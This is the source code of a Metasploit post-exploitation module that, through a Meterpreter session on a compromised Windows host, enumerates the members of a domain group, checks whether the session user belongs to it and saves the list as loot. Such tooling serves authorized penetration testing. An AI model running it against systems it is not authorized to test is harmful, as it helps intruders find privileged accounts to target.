Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Priv
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Windows Gather Enumerate Domain Group',
14
        'Description' => %q{
15
          This module extracts user accounts from the specified domain group
16
          and stores the results in the loot. It will also verify if session
17
          account is in the group. Data is stored in loot in a format that
18
          is compatible with the token_hunter plugin. This module must be
19
          run on a session running as a domain user.
20
        },
21
        'License' => MSF_LICENSE,
22
        'Author' => [
23
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
24
          'Stephen Haywood <haywoodsb[at]gmail.com>'
25
        ],
26
        'Platform' => [ 'win' ],
27
        'SessionTypes' => [ 'meterpreter' ],
28
        'Notes' => {
29
          'Stability' => [CRASH_SAFE],
30
          'Reliability' => [],
31
          'SideEffects' => []
32
        },
33
        'Compat' => {
34
          'Meterpreter' => {
35
            'Commands' => %w[
36
              stdapi_sys_config_getuid
37
            ]
38
          }
39
        }
40
      )
41
    )
42
    register_options([
43
      OptString.new('GROUP', [true, 'Domain Group to enumerate', nil])
44
    ])
45
  end
46

47
  def run
48
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
49
    print_status("Running module against #{hostname} (#{session.session_host})")
50

51
    group = datastore['GROUP']
52

53
    fail_with(Failure::BadConfig, 'GROUP must be set.') if group.blank?
54

55
    domain = get_domain_name
56

57
    fail_with(Failure::Unknown, 'Could not retrieve domain name. Is the host part of a domain?') if domain.blank?
58

59
    netbios_domain_name = domain.split('.').first.upcase
60

61
    members = get_members_from_group(group, domain) || []
62

63
    fail_with(Failure::Unknown, "No members found for '#{domain}\\#{group}' group.") if members.blank?
64

65
    print_status("Found #{members.length} users in '#{domain}\\#{group}' group.")
66

67
    loot = []
68
    members.each do |user|
69
      print_status("\t#{netbios_domain_name}\\#{user}")
70
      loot << "#{netbios_domain_name}\\#{user}"
71
    end
72

73
    user_domain, user = client.sys.config.getuid.split('\\')
74

75
    if user_domain.downcase.include?(netbios_domain_name.downcase) && members.map { |u| u.downcase == user.downcase }.include?(true)
76
      print_good("Current session running as #{domain}\\#{user} is a member of #{domain}\\#{group}!")
77
    else
78
      print_status("Current session running as #{domain}\\#{user} is not a member of #{domain}\\#{group}")
79
    end
80

81
    loot_file = store_loot(
82
      'domain.group.members',
83
      'text/plain',
84
      session,
85
      loot.join("\n"),
86
      nil,
87
      group
88
    )
89

90
    print_good("User list stored in #{loot_file}")
91
  end
92
end
93

94